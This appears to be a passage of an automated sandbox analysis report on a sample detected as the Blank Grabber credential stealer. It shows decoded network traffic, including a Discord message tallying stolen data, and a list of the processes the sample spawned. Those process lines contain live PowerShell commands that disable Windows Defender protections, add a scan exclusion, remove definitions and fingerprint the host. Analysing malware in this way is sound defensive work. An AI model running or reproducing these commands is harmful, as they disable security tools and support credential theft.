                                                                                                                                                                    2023-09-15 20:16:20 UTC800OUTData Raw: 38 8c 84 51 81 9d e3 24 84 b3 95 37 a8 9b 17 d8 ec 4c e9 8a d6 0a 8c 50 5d 04 5d d2 e2 93 6d 6b 47 8d 61 c5 c1 7b ff 39 40 14 e4 77 00 e7 0a 2c 83 5f 72 80 ee 5e 0c 26 e2 5d aa e2 e7 48 c3 68 76 0d a5 3b a4 7b 3a 47 13 1b 2b 32 97 c4 94 db 62 2b 2e 4c cf 0e 54 b7 8b 12 4e ef 29 6f c1 fe af fc 66 c0 77 37 1f 76 ad a0 a7 e9 89 e0 c0 59 1e 9b 59 e0 01 c4 15 39 92 b3 5f e8 d8 fa b7 9b f4 5d 7e 20 c9 c0 1e a4 41 b3 60 14 3c 01 86 77 d5 53 6e 23 1f 8c bc 59 dc 49 37 95 9a 2d c5 5d f0 13 cd 3e 5e 13 91 19 70 8e 6c ae 30 a9 2c 5d b5 3a 8d 31 d1 db 9d 66 36 05 28 f8 39 24 00 8d 1c 56 f3 21 75 34 0c be 98 92 e4 0a 48 d2 a5 d9 66 f9 df 48 1f 4e a9 96 a7 7c 8a d7 8f f2 52 a0 4b fe 9b ae 3b a3 90 df 7b f9 f9 7f 54 ef 6b 62 ad ba df 73 41 2a fc bc 69 bd 19 5d cb 1c 3d
                                                                                                                                                                    Data Ascii: 8Q$7LP]]mkGa{9@w,_r^&]Hhv;{:G+2b+.LTN)ofw7vYY9_]~ A`<wSn#YI7-]>^pl0,]:1f6(9$V!u4HfHN|RK;{TkbsA*i]=
                                                                                                                                                                    2023-09-15 20:16:20 UTC816OUTData Raw: f4 76 6a 23 20 46 f5 78 23 37 d3 05 5e 59 21 c0 07 2f 87 5c cb 63 9c d3 6a 87 45 6a 6b a8 49 76 dc bf 0f be d2 09 eb 76 64 96 6b c4 fc 80 66 a4 c1 af b1 ea a4 f4 08 56 7f 14 15 f5 6f d4 15 28 89 74 90 28 bd 9d 22 c2 02 4e 4b f9 10 e6 ba 51 98 38 3b bf a2 58 d6 a4 1a a0 60 b1 f3 86 d5 86 42 2b ad 18 74 f6 07 b3 67 6c d8 d4 d7 a6 b6 02 4b 7a ea 62 c3 23 d6 db c7 64 69 10 5f 6d 91 ad 76 65 1a bd 82 5c c2 76 a7 68 8e e1 08 77 1f 7a f5 fe 8f f0 02 69 be 17 8e a4 8d 6a b5 a9 5d c4 3a 65 58 ed a2 5a a9 51 70 e3 6e 74 d6 15 03 a8 81 bb 7e 15 c2 ac ba 84 8a b8 05 63 a0 a5 d0 93 6b 36 55 44 23 f3 8f 92 50 21 06 de 3a 0a 36 57 29 9c 2d f0 9d 35 32 cb 9a 67 2c 22 37 bb e5 2f 4a 25 6c 5a e5 3d e0 4f 86 2a a6 00 e3 02 ad 27 46 d8 20 ad 2a 53 66 0b 21 5c 6a dd 79 56 fb
                                                                                                                                                                    Data Ascii: vj# Fx#7^Y!/\cjEjkIvvdkfVo(t("NKQ8;X`B+tglKzb#di_mve\vhwzij]:eXZQpnt~ck6UD#P!:6W)-52g,"7/J%lZ=O*'F *Sf!\jyV
                                                                                                                                                                    2023-09-15 20:16:21 UTC819INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Fri, 15 Sep 2023 20:16:21 GMT
                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: close
                                                                                                                                                                    set-cookie: __dcfduid=bc633d50540411ee9a38c27f7ba35664; Expires=Wed, 13-Sep-2028 20:16:21 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
                                                                                                                                                                    strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                    x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                    x-ratelimit-limit: 5
                                                                                                                                                                    x-ratelimit-remaining: 4
                                                                                                                                                                    x-ratelimit-reset: 1694808982
                                                                                                                                                                    x-ratelimit-reset-after: 1
                                                                                                                                                                    Via: 1.1 google
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ZpXguzwIvcgLV29%2BSR9Y0%2FYvpHE6mRXE6g4yciUl9uIsbAlww%2FVIdzinNacW4jbASef2zdyITW8UiGlTqPJ79cRNZdFa8mfryQREU9lYqBfK7NMmCbLGk145A0wm"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Set-Cookie: __sdcfduid=bc633d50540411ee9a38c27f7ba35664c109257d842e195ebaed0275ef14ee36899ff93df3541f71ce642e6fcb59e134; Expires=Wed, 13-Sep-2028 20:16:21 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
                                                                                                                                                                    Set-Cookie: __cfruid=bdf8bc33dab33955ba05e6ec71dc8699b1d1bda2-1694808981; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                    Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                    2023-09-15 20:16:21 UTC820INData Raw: 43 46 2d 52 41 59 3a 20 38 30 37 33 38 62 66 64 65 61 32 36 30 66 38 35 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: CF-RAY: 80738bfdea260f85-EWR
                                                                                                                                                                    2023-09-15 20:16:21 UTC820INData Raw: 38 39 30 0d 0a 7b 22 69 64 22 3a 22 31 31 35 32 33 33 37 31 32 39 36 34 35 35 35 35 39 31 34 22 2c 22 74 79 70 65 22 3a 30 2c 22 63 6f 6e 74 65 6e 74 22 3a 22 7c 7c 40 65 76 65 72 79 6f 6e 65 7c 7c 22 2c 22 63 68 61 6e 6e 65 6c 5f 69 64 22 3a 22 31 31 32 35 31 32 36 33 39 36 31 30 31 30 32 31 38 37 39 22 2c 22 61 75 74 68 6f 72 22 3a 7b 22 69 64 22 3a 22 31 31 32 35 33 35 37 33 32 39 37 39 38 34 31 38 34 37 32 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 42 6c 61 6e 6b 20 47 72 61 62 62 65 72 22 2c 22 61 76 61 74 61 72 22 3a 22 32 39 65 30 65 65 63 63 66 34 30 33 65 34 39 61 63 38 38 39 39 30 32 38 63 61 65 31 34 64 30 63 22 2c 22 64 69 73 63 72 69 6d 69 6e 61 74 6f 72 22 3a 22 30 30 30 30 22 2c 22 70 75 62 6c 69 63 5f 66 6c 61 67 73 22 3a 30 2c 22 66 6c 61
                                                                                                                                                                    Data Ascii: 890{"id":"1152337129645555914","type":0,"content":"||@everyone||","channel_id":"1125126396101021879","author":{"id":"1125357329798418472","username":"Blank Grabber","avatar":"29e0eeccf403e49ac8899028cae14d0c","discriminator":"0000","public_flags":0,"fla
                                                                                                                                                                    2023-09-15 20:16:21 UTC821INData Raw: 66 69 20 50 61 73 73 77 6f 72 64 73 20 3a 20 30 5c 6e 57 65 62 63 61 6d 20 3a 20 30 5c 6e 4d 69 6e 65 63 72 61 66 74 20 53 65 73 73 69 6f 6e 73 20 3a 20 30 5c 6e 45 70 69 63 20 53 65 73 73 69 6f 6e 20 3a 20 4e 6f 5c 6e 53 74 65 61 6d 20 53 65 73 73 69 6f 6e 20 3a 20 4e 6f 5c 6e 55 70 6c 61 79 20 53 65 73 73 69 6f 6e 20 3a 20 4e 6f 5c 6e 47 72 6f 77 74 6f 70 69 61 20 53 65 73 73 69 6f 6e 20 3a 20 4e 6f 5c 6e 53 63 72 65 65 6e 73 68 6f 74 20 3a 20 59 65 73 5c 6e 53 79 73 74 65 6d 20 49 6e 66 6f 20 3a 20 4e 6f 60 60 60 2a 2a 22 2c 22 63 6f 6c 6f 72 22 3a 33 34 33 30 33 2c 22 74 68 75 6d 62 6e 61 69 6c 22 3a 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 42 6c 61 6e 6b 2d 63 2f 42
                                                                                                                                                                    Data Ascii: fi Passwords : 0\nWebcam : 0\nMinecraft Sessions : 0\nEpic Session : No\nSteam Session : No\nUplay Session : No\nGrowtopia Session : No\nScreenshot : Yes\nSystem Info : No```**","color":34303,"thumbnail":{"url":"https://raw.githubusercontent.com/Blank-c/B
                                                                                                                                                                    2023-09-15 20:16:21 UTC822INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                    Statistics

                                                                                                                                                                    CPU Usage

                                                                                                                                                                    Click to jump to process

                                                                                                                                                                    Memory Usage

                                                                                                                                                                    Click to jump to process

                                                                                                                                                                    High Level Behavior Distribution

                                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                                    Behavior

                                                                                                                                                                    Click to jump to process

                                                                                                                                                                    System Behavior

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:0
                                                                                                                                                                    Start time:22:15:54
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    Imagebase:0x7ff614c70000
                                                                                                                                                                    File size:7'380'816 bytes
                                                                                                                                                                    MD5 hash:B8E16B93BE678043EC587EC1C759C2DE
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Yara matches:
                                                                                                                                                                    • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.188703701.0000024133485000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.246634028.0000024133487000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.188703701.0000024133487000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:1
                                                                                                                                                                    Start time:22:15:54
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    Imagebase:0x7ff614c70000
                                                                                                                                                                    File size:7'380'816 bytes
                                                                                                                                                                    MD5 hash:B8E16B93BE678043EC587EC1C759C2DE
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Yara matches:
                                                                                                                                                                    • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.244345388.0000014C6D074000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.244090909.0000014C6DD8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.192120671.0000014C6CCB7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.244259837.0000014C6D074000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.244317157.0000014C6CDAB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000002.244794206.0000014C6CDB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.244794206.0000014C6CDB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000002.244872297.0000014C6D074000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:2
                                                                                                                                                                    Start time:22:15:56
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VSSADMIN.EXE.exe'"
                                                                                                                                                                    Imagebase:0x7ff7a8120000
                                                                                                                                                                    File size:273'920 bytes
                                                                                                                                                                    MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:3
                                                                                                                                                                    Start time:22:15:56
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                                                                                                                                                    Imagebase:0x7ff7a8120000
                                                                                                                                                                    File size:273'920 bytes
                                                                                                                                                                    MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:4
                                                                                                                                                                    Start time:22:15:57
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff6bab10000
                                                                                                                                                                    File size:625'664 bytes
                                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:5
                                                                                                                                                                    Start time:22:15:57
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff6bab10000
                                                                                                                                                                    File size:625'664 bytes
                                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:6
                                                                                                                                                                    Start time:22:15:57
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                    Imagebase:0x7ff7a8120000
                                                                                                                                                                    File size:273'920 bytes
                                                                                                                                                                    MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:7
                                                                                                                                                                    Start time:22:15:57
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff6bab10000
                                                                                                                                                                    File size:625'664 bytes
                                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:8
                                                                                                                                                                    Start time:22:15:57
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                                                                                                                                                    Imagebase:0x7ff6afba0000
                                                                                                                                                                    File size:447'488 bytes
                                                                                                                                                                    MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:9
                                                                                                                                                                    Start time:22:15:57
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VSSADMIN.EXE.exe'
                                                                                                                                                                    Imagebase:0x7ff6afba0000
                                                                                                                                                                    File size:447'488 bytes
                                                                                                                                                                    MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:10
                                                                                                                                                                    Start time:22:15:57
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:tasklist /FO LIST
                                                                                                                                                                    Imagebase:0x7ff667630000
                                                                                                                                                                    File size:100'352 bytes
                                                                                                                                                                    MD5 hash:B12E0F9C42075B4B7AD01D0B6A48485D
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:11
                                                                                                                                                                    Start time:22:15:58
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                                                    Imagebase:0x7ff7a8120000
                                                                                                                                                                    File size:273'920 bytes
                                                                                                                                                                    MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:12
                                                                                                                                                                    Start time:22:15:58
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff6bab10000
                                                                                                                                                                    File size:625'664 bytes
                                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:13
                                                                                                                                                                    Start time:22:15:58
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:wmic csproduct get uuid
                                                                                                                                                                    Imagebase:0x7ff6a2030000
                                                                                                                                                                    File size:521'728 bytes
                                                                                                                                                                    MD5 hash:EC80E603E0090B3AC3C1234C2BA43A0F
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:14
                                                                                                                                                                    Start time:22:15:59
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
                                                                                                                                                                    Imagebase:0x7ff7a8120000
                                                                                                                                                                    File size:273'920 bytes
                                                                                                                                                                    MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:15
                                                                                                                                                                    Start time:22:15:59
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff6bab10000
                                                                                                                                                                    File size:625'664 bytes
                                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:16
                                                                                                                                                                    Start time:22:15:59
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\reg.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
                                                                                                                                                                    Imagebase:0x7ff720240000
                                                                                                                                                                    File size:72'704 bytes
                                                                                                                                                                    MD5 hash:E3DACF0B31841FA02064B4457D44B357
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:17
                                                                                                                                                                    Start time:22:15:59
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
                                                                                                                                                                    Imagebase:0x7ff7a8120000
                                                                                                                                                                    File size:273'920 bytes
                                                                                                                                                                    MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:18
                                                                                                                                                                    Start time:22:15:59
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff6bab10000
                                                                                                                                                                    File size:625'664 bytes
                                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:20
                                                                                                                                                                    Start time:22:15:59
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\reg.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
                                                                                                                                                                    Imagebase:0x7ff720240000
                                                                                                                                                                    File size:72'704 bytes
                                                                                                                                                                    MD5 hash:E3DACF0B31841FA02064B4457D44B357
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:21
                                                                                                                                                                    Start time:22:16:00
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                                                                                    Imagebase:0x7ff6bab10000
                                                                                                                                                                    File size:273'920 bytes
                                                                                                                                                                    MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:22
                                                                                                                                                                    Start time:22:16:00
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff6bab10000
                                                                                                                                                                    File size:625'664 bytes
                                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:23
                                                                                                                                                                    Start time:22:16:00
                                                                                                                                                                    Start date:15/09/2023
                                                                                                                                                                    Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:wmic path win32_VideoController get name
                                                                                                                                                                    Imagebase:0x7ff6a2030000
                                                                                                                                                                    File size:521'728 bytes
                                                                                                                                                                    MD5 hash:EC80E603E0090B3AC3C1234C2BA43A0F
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:24
                                                                                                                                                                    Start time:22:16:00
